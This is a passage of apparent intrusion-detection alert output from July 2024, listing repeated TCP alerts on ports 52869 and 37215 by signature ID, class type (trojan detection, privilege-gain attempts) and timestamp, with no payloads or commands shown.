                      Source Port:41742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2831300
                      Source Port:45526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:55.981552
                      SID:2831300
                      Source Port:44010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.929504
                      SID:2831300
                      Source Port:34352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.363153
                      SID:2027339
                      Source Port:59790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2027339
                      Source Port:53548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2829579
                      Source Port:32978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.218849
                      SID:2027339
                      Source Port:53418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.357082
                      SID:2829579
                      Source Port:33630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2835222
                      Source Port:55170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.290948
                      SID:2027339
                      Source Port:57554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.088639
                      SID:2831300
                      Source Port:57414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.793562
                      SID:2027339
                      Source Port:54248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.420799
                      SID:2025132
                      Source Port:48606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.151260
                      SID:2025132
                      Source Port:58744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.296188
                      SID:2025132
                      Source Port:32892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2025132
                      Source Port:53566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:15.422064
                      SID:2831300
                      Source Port:45312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.125247
                      SID:2027339
                      Source Port:59178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:56154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:59200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994181
                      SID:2025132
                      Source Port:49968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2027339
                      Source Port:38866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.048493
                      SID:2025132
                      Source Port:47698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.512016
                      SID:2025132
                      Source Port:39508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.447330
                      SID:2025132
                      Source Port:58078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.767606
                      SID:2831300
                      Source Port:40178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.056587
                      SID:2831300
                      Source Port:49096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.345950
                      SID:2025132
                      Source Port:50214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.823104
                      SID:2831300
                      Source Port:32864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.813486
                      SID:2831300
                      Source Port:52498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.283632
                      SID:2025132
                      Source Port:39728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324298
                      SID:2835222
                      Source Port:39332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.185323
                      SID:2027339
                      Source Port:56790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.111758
                      SID:2831300
                      Source Port:38874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.286487
                      SID:2025132
                      Source Port:45172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.234952
                      SID:2027339
                      Source Port:60994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.085828
                      SID:2027339
                      Source Port:60528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.143470
                      SID:2025132
                      Source Port:42336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2831300
                      Source Port:56162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.518986
                      SID:2025132
                      Source Port:57134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2027339
                      Source Port:50522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.550045
                      SID:2025132
                      Source Port:40202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.208471
                      SID:2027339
                      Source Port:44098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.422288
                      SID:2027339
                      Source Port:36510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557200
                      SID:2835222
                      Source Port:50730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2027339
                      Source Port:56756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2027339
                      Source Port:42968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.855430
                      SID:2831300
                      Source Port:50262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.489738
                      SID:2027339
                      Source Port:51722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2025132
                      Source Port:55252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.442399
                      SID:2025132
                      Source Port:46192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.565127
                      SID:2027339
                      Source Port:55272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2027339
                      Source Port:40810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:46106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.955037
                      SID:2027339
                      Source Port:33434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.535864
                      SID:2025132
                      Source Port:49816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:53402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.413993
                      SID:2027339
                      Source Port:33460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:53260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.112749
                      SID:2025132
                      Source Port:38144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.091054
                      SID:2027339
                      Source Port:35426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220683
                      SID:2835222
                      Source Port:47864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.535822
                      SID:2831300
                      Source Port:37210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:06.283235
                      SID:2027339
                      Source Port:58646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627950
                      SID:2835222
                      Source Port:53346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2027339
                      Source Port:60814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:56426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.754007
                      SID:2829579
                      Source Port:33798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.236888
                      SID:2831300
                      Source Port:39964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.426541
                      SID:2027339
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.529818
                      SID:2025132
                      Source Port:53876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.325373
                      SID:2831300
                      Source Port:43658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.260147
                      SID:2027339
                      Source Port:56942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2835222
                      Source Port:57878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.319581
                      SID:2027339
                      Source Port:54240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2027339
                      Source Port:40314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.429320
                      SID:2025132
                      Source Port:53970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.037944
                      SID:2831300
                      Source Port:59668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.186329
                      SID:2025132
                      Source Port:33186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.939890
                      SID:2829579
                      Source Port:53906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.974761
                      SID:2831300
                      Source Port:42390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.156324
                      SID:2027339
                      Source Port:58726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.107735
                      SID:2829579
                      Source Port:45968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2027339
                      Source Port:43726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.174834
                      SID:2025132
                      Source Port:58438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2835222
                      Source Port:38920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.392607
                      SID:2027339
                      Source Port:53422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:11.843007
                      SID:2835222
                      Source Port:52858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.459685
                      SID:2831300
                      Source Port:52484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2829579
                      Source Port:57376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.365807
                      SID:2027339
                      Source Port:59840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.147601
                      SID:2025132
                      Source Port:50840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:44722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.377268
                      SID:2027339
                      Source Port:59454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.174161
                      SID:2027339
                      Source Port:42702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2027339
                      Source Port:39866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:51844
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.567071
                      SID:2025132
                      Source Port:33520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.444465
                      SID:2027339
                      Source Port:46488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.269499
                      SID:2027339
                      Source Port:33120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522257
                      SID:2829579
                      Source Port:36974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.255397
                      SID:2027339
                      Source Port:45172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.290865
                      SID:2831300
                      Source Port:50650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.508652
                      SID:2831300
                      Source Port:54744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2027339
                      Source Port:46382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.935123
                      SID:2027339
                      Source Port:56312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.280800
                      SID:2831300
                      Source Port:44334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.951517
                      SID:2025132
                      Source Port:60322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2831300
                      Source Port:33970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.873559
                      SID:2831300
                      Source Port:55554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:56222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.266573
                      SID:2027339
                      Source Port:45598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2829579
                      Source Port:55230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.644108
                      SID:2027339
                      Source Port:48092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.200381
                      SID:2027339
                      Source Port:56994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.244446
                      SID:2027339
                      Source Port:59116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.845937
                      SID:2025132
                      Source Port:57338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.580139
                      SID:2835222
                      Source Port:38174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2831300
                      Source Port:52206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.523323
                      SID:2831300
                      Source Port:46746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:42.331305
                      SID:2027339
                      Source Port:42116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:35728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.048253
                      SID:2027339
                      Source Port:46532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.526128
                      SID:2027339
                      Source Port:47970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2835222
                      Source Port:51746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:31.687974
                      SID:2027339
                      Source Port:37116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.217282
                      SID:2831300
                      Source Port:47058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:33.055161
                      SID:2025132
                      Source Port:58310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:32.540944
                      SID:2025132
                      Source Port:43338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:56622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.365340
                      SID:2027339
                      Source Port:55388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.207362
                      SID:2027339
                      Source Port:48594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.582686
                      SID:2027339
                      Source Port:44164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.444876
                      SID:2027339
                      Source Port:46558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.273031
                      SID:2831300
                      Source Port:48642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.756534
                      SID:2025132
                      Source Port:56644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:40042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.619289
                      SID:2835222
                      Source Port:43644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.201041
                      SID:2025132
                      Source Port:53366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.745087
                      SID:2831300
                      Source Port:60526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.092497
                      SID:2025132
                      Source Port:42370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.770015
                      SID:2025132
                      Source Port:53082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.717242
                      SID:2025132
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.553140
                      SID:2027339
                      Source Port:51890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:58.705456
                      SID:2025132
                      Source Port:51420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.720996
                      SID:2831300
                      Source Port:42066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.251993
                      SID:2025132
                      Source Port:55898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.797833
                      SID:2027339
                      Source Port:43292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.749345
                      SID:2027339
                      Source Port:34920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.641348
                      SID:2027339
                      Source Port:53078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.880153
                      SID:2027339
                      Source Port:40082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.679529
                      SID:2027339
                      Source Port:45642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2835222
                      Source Port:60644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.526701
                      SID:2025132
                      Source Port:42610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.079491
                      SID:2025132
                      Source Port:43284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2831300
                      Source Port:42562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2835222
                      Source Port:44392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2027339
                      Source Port:44062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:54098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.345907
                      SID:2025132
                      Source Port:49020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.106820
                      SID:2829579
                      Source Port:49394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.640556
                      SID:2025132
                      Source Port:55198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.912153
                      SID:2831300
                      Source Port:55924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.229203
                      SID:2025132
                      Source Port:52144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2829579
                      Source Port:46170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262795
                      SID:2027339
                      Source Port:33484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2829579
                      Source Port:41892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.114018
                      SID:2831300
                      Source Port:36426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.691312
                      SID:2027339
                      Source Port:44062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:52214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454499
                      SID:2831300
                      Source Port:48860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.965613
                      SID:2027339
                      Source Port:50628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.422953
                      SID:2027339
                      Source Port:43966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.671322
                      SID:2027339
                      Source Port:50430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.287042
                      SID:2025132
                      Source Port:47218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2831300
                      Source Port:35732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.071724
                      SID:2025132
                      Source Port:57188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:48.772924
                      SID:2831300
                      Source Port:57778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.223857
                      SID:2027339
                      Source Port:44062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
